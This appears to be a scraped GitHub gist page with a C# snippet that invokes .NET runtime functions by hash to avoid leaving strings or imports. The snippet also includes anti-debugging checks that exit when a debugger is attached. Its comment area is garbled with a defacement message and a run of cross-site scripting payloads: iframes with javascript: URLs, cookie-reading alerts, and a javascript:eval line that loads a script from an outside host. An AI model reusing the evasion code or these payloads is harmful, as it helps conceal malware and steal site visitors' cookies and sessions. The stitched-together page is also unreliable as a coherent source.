-
-
Save rvrsh3ll/0baab9708e1ad73ac4fcf298e60cb9a9 to your computer and use it in GitHub Desktop.
A very minimalistic approach of calling .net runtime functions or accessing properties using only hashes as identifiers. It does not leave any strings or import references since we dynamically resolve the required member from the mscorlib assembly on runtime. Read the blog post: https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avo…
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System.Linq; | |
| using System.Reflection; | |
| namespace HashInvoke; | |
| public class HInvoke | |
| { | |
| public static T InvokeMethod<T>(uint classID, uint methodID, object[]? args = null) | |
| { | |
| // Get the System assembly and go trough all its types hash their name | |
| // and find the hash that matches the supplied one | |
| var typeDef = typeof(void).Assembly.GetTypes() | |
| .FirstOrDefault(type => GetHash(type.FullName!) == classID); | |
| // Use the type and go trough its methods hash their name | |
| // and find the hash that matches the supplied one | |
| var methodInfo = typeDef.GetRuntimeMethods() | |
| .FirstOrDefault(method => GetHash(method.Name) == methodID); | |
| // Invoke the resolved method with the supplied args | |
| if (methodInfo != null) | |
| return (T) methodInfo.Invoke(null, args); | |
| return default!; | |
| } | |
| public static void InvokeMethod(uint classID, uint methodID, object[]? args = null) | |
| { | |
| // This part can be adjusted to work with any Assembly you want | |
| var typeDef = typeof(void).Assembly.GetTypes() | |
| .FirstOrDefault(type => GetHash(type.FullName!) == classID); | |
| var methodInfo = typeDef.GetRuntimeMethods() | |
| .FirstOrDefault(method => GetHash(method.Name) == methodID); | |
| if (methodInfo != null) | |
| methodInfo.Invoke(null, args); | |
| } | |
| public static T GetPropertyValue<T>(uint classID, uint propertyID) | |
| { | |
| var typeDef = typeof(void).Assembly.GetTypes() | |
| .FirstOrDefault(type => GetHash(type.FullName!) == classID); | |
| var propertyInfo = typeDef.GetRuntimeProperties() | |
| .FirstOrDefault(property => GetHash(property.Name) == propertyID); | |
| if (propertyInfo != null) | |
| return (T) propertyInfo.GetValue(null); | |
| return default!; | |
| } | |
| private static uint GetHash(string name) | |
| { | |
| uint sum = 0; | |
| foreach (char c in name) | |
| { | |
| sum = (sum >> 0xA | sum << 0x11) + c; | |
| } | |
| // zero terminator: | |
| sum = (sum >> 0xA | sum << 0x11) + 0; | |
| return sum; | |
| } | |
| } | |
| internal static unsafe class Program | |
| { | |
| public static void Main (string[] args) | |
| { | |
| Console.WriteLine ( | |
| "Hello you look nice, you would not attach a debugger to me would u?"); | |
| // Using the Microsoft.Win32.Win32Native functions we can avoid using | |
| // Pinvoke | |
| var module = HInvoke.InvokeMethod<IntPtr> ( | |
| 13239936, 811580934, | |
| new object[]{ | |
| "kernel32.dll" }); // Microsoft.Win32.Win32Native.GetModuleHandle | |
| var address = HInvoke.InvokeMethod<IntPtr> ( | |
| 13239936, 1721745356, | |
| new object[]{ | |
| module, | |
| "IsDebuggerPresent" }); // Microsoft.Win32.Win32Native.GetProcAddress | |
| if (((delegate * unmanaged[Stdcall]<bool>) address) ()) | |
| Console.WriteLine ("Hey meanie I said no debugging :c"); | |
| HInvoke.InvokeMethod (2164260848, 3770666652); // System.Console.ReadKey(); | |
| if (HInvoke.GetPropertyValue<bool> ( | |
| 1577037771, 179842977)) // System.Diagnostics.Debugger.IsAttached | |
| HInvoke.InvokeMethod (1174404872, 2029614223, | |
| new object[]{ 0 }); // System.Environment.Exit(0) | |
| } | |
| } |
HTML
html
HTML
HTML
HTML
HTML
HTML
HTML
HTML
HTML HTML HTML AI address,addressArmour Infosec
HTML
HACKED BY TALAOHU28
I WANT TO BACK FREE
">
">
">
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)";
">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123
">
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> "><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF "><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123
"><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123
><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr g'"></IFRAME>Hover the cursor to the LEFT of this Message
&ParamHeight=250 <IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> "><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123
"><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123
<iframe src=http://xss.rocks/scriptlet.html < <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> <iframe src=" javascript:prompt(1) "> <style>{font-family:'' <scRipt >alert(1) {Opera}
javascript:eval('var a=document.createElement('script');a.src='https://js.rip/jp0g30y4o6\';document.body.appendChild(a)')
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
click me!